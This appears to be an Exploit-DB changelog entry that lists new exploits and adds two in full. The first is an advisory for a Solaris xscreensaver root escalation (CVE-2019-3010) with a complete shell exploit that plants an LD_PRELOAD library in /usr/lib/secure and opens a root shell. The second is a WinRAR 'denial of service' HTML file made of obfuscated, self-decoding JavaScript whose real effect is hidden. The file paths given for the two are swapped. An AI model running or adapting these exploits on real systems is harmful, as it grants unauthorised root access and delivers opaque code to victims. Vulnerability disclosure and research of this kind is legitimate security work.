DB: 2019-10-22

7 changes to exploits/shellcodes

winrar 5.80 64bit - Denial of Service
Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)

sudo 1.2.27 - Security Bypass
sudo 1.8.27 - Security Bypass
winrar 5.80 - XML External Entity Injection
Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution
Solaris 11.4 - xscreensaver Privilege Escalation

CyberArk Password Vault 10.6 - Authentication Bypass

Author: Offensive Security

exploits/linux/webapps/47512.txt

@@ -0,0 +1,168 @@
+@Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16)
+
+         Title:  Local privilege escalation on Solaris 11.x via xscreensaver
+   Application:  Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4
+    Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3
+    Other versions starting from 5.06 are potentially affected
+     Platforms:  Oracle Solaris 11.x (tested on 11.4 and 11.3)
+    Other platforms are potentially affected (see below)
+   Description:  A local attacker can gain root privileges by exploiting a
+    design error vulnerability in the xscreensaver distributed with
+    Solaris
+        Author:  Marco Ivaldi <[email protected]>
+ Vendor Status:  <[email protected]> notified on 2019-07-09
+      CVE Name:  CVE-2019-3010
+   CVSS Vector:  CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8)
+    References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt
+    https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
+    https://www.jwz.org/xscreensaver/
+    https://www.oracle.com/technetwork/server-storage/solaris11/
+    https://www.mediaservice.net/
+    https://0xdeadbeef.info/
+
+1. Abstract.
+
+Exploitation of a design error vulnerability in xscreensaver, as distributed
+with Solaris 11.x, allows local attackers to create (or append to) arbitrary
+files on the system, by abusing the -log command line switch introduced in
+version 5.06. This flaw can be leveraged to cause a denial of service condition
+or to escalate privileges to root.
+
+2. Example Attack Session.
+
+raptor@stalker:~$ cat /etc/release
+                             Oracle Solaris 11.4 X86
+  Copyright (c) 1983, 2018, Oracle and/or its affiliates.  All rights reserved.
+                            Assembled 16 August 2018
+raptor@stalker:~$ uname -a
+SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc
+raptor@stalker:~$ id
+uid=100(raptor) gid=10(staff)
+raptor@stalker:~$ chmod +x raptor_xscreensaver
+raptor@stalker:~$ ./raptor_xscreensaver
+raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
+Copyright (c) 2019 Marco Ivaldi <[email protected]>
+[...]
+Oracle Corporation      SunOS 5.11      11.4    Aug 2018
+root@stalker:~# id
+uid=0(root) gid=0(root)
+
+3. Affected Platforms.
+
+This vulnerability was confirmed on the following platforms:
+
+* Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation]
+* Oracle Solaris 11.x SPARC [untested]
+
+Previous Oracle Solaris 11 versions might also be vulnerable.
+
+Based on our analysis and on feedback kindly provided by Alan Coopersmith of
+Oracle, we concluded that this is a Solaris-specific vulnerability, caused by
+the fact that Oracle maintains a slightly different codebase from the upstream
+one. Alan explained this as follows:
+
+"The problem in question here appears to be inherited from the long-ago fork
+[originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based
+unlock dialog with accessibility support to replace the non-accessible Xlib
+unlock dialog that upstream provides, which moves the uid reset to after where
+the log file opening was later added."
+
+Specifically, the problem arises because of this bit of Solaris patches:
+https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770
+
+As an interesting side note, it appears Red Hat dropped this code back in 2002
+with version 4.05-5:
+https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179
+
+4. Fix.
+
+Oracle has assigned the tracking# S1182608 and has released a fix for all
+affected and supported versions of Solaris in their Critical Patch Update (CPU)
+of October 2019.
+
+As a temporary workaround, it is also possible to remove the setuid bit from
+the xscreensaver executable as follows (note that this might prevent it from
+working properly):
+
+bash-3.2# chmod -s /usr/bin/xscreensaver
+
+5. Proof of Concept.
+
+An exploit for Oracle Solaris 11.x has been developed as a proof of concept. It
+can be downloaded from:
+
+https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver
+
+#!/bin/sh
+
+#
+# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
+# Copyright (c) 2019 Marco Ivaldi <[email protected]>
+#
+# Exploitation of a design error vulnerability in xscreensaver, as 
+# distributed with Solaris 11.x, allows local attackers to create
+# (or append to) arbitrary files on the system, by abusing the -log
+# command line switch introduced in version 5.06. This flaw can be
+# leveraged to cause a denial of service condition or to escalate
+# privileges to root. This is a Solaris-specific vulnerability,
+# caused by the fact that Oracle maintains a slightly different
+# codebase from the upstream one (CVE-2019-3010).
+#
+# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
+# "Good hackers force luck." -- ~A.
+#
+# This exploit targets the /usr/lib/secure/ directory in order
+# to escalate privileges with the LD_PRELOAD technique. The
+# implementation of other exploitation vectors, including those
+# that do not require gcc to be present on the target system, is
+# left as an exercise to fellow UNIX hackers;)
+#
+# Usage:
+# raptor@stalker:~$ chmod +x raptor_xscreensaver
+# raptor@stalker:~$ ./raptor_xscreensaver
+# [...]
+# Oracle Corporation      SunOS 5.11      11.4    Aug 2018
+# root@stalker:~# id
+# uid=0(root) gid=0(root)
+# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
+#
+# Vulnerable platforms:
+# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
+# Oracle Solaris 11 SPARC [untested]
+#
+
+echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
+echo "Copyright (c) 2019 Marco Ivaldi <[email protected]>"
+echo
+
+# prepare the payload
+echo "int getuid(){return 0;}" > /tmp/getuid.c
+gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
+if [ $? -ne 0 ]; then
+echo "error: problem compiling the shared library, check your gcc"
+exit 1
+fi
+
+# check the architecture
+LOG=/usr/lib/secure/getuid.so
+file /bin/su | grep 64-bit >/dev/null 2>&1
+if [ $? -eq 0 ]; then
+LOG=/usr/lib/secure/64/getuid.so
+fi
+
+# start our own xserver
+# alternatively we can connect back to a valid xserver (e.g. xquartz)
+/usr/bin/Xorg :1 &
+
+# trigger the bug
+umask 0
+/usr/bin/xscreensaver -display :1 -log $LOG &
+sleep 5
+
+# clean up
+pkill -n xscreensaver
+pkill -n Xorg
+
+# LD_PRELOAD-fu
+cp /tmp/getuid.so $LOG
+LD_PRELOAD=$LOG su -

exploits/solaris/local/47529.txt

@@ -0,0 +1,73 @@
+# Exploit Title: winrar 5.80 64bit - Denial of Service
+# Date: 2019-10-19
+# Exploit Author: alblalawi
+# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
+# Version: 5.80
+# Tested on: Microsoft Windows Version 10.0.18362.418 64bit
+
+# 1- open winrar or any file.rar
+# 2- help
+# 3- help topics
+# 4- Drag the exploit to the window
+
+# Save the content html
+
+
+<script type="text/javascript">
+//<![CDATA[
+<!--
+var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
+"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
+"\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" +
+"e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+
+"\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" +
+"83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+
+"\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+
+"\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" +
+"5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" +
+"\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" +
+"F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" +
+"\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+
+"\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" +
+"\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" +
+",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+
+"\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" +
+"\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" +
+"3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+
+"RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+
+"\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+
+"\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" +
+"\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+
+"\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+
+"\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." +
+"o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" +
+"=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+
+")"                                                                           ;
+while(x=eval(x));
+//-->
+//]]>
+</script>
+<script type="text/javascript">
+//<![CDATA[
+<!--
+var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
+"=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" +
+".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+
+"\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" +
+"\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" +
+"30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" +
+"\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" +
+"0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" +
+"\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" +
+"J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" +
+"\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" +
+"f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" +
+"AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" +
+"30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" +
+"C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" +
+"\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" +
+";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")"                 ;
+while(x=eval(x));
+//-->
+//]]>
+</script>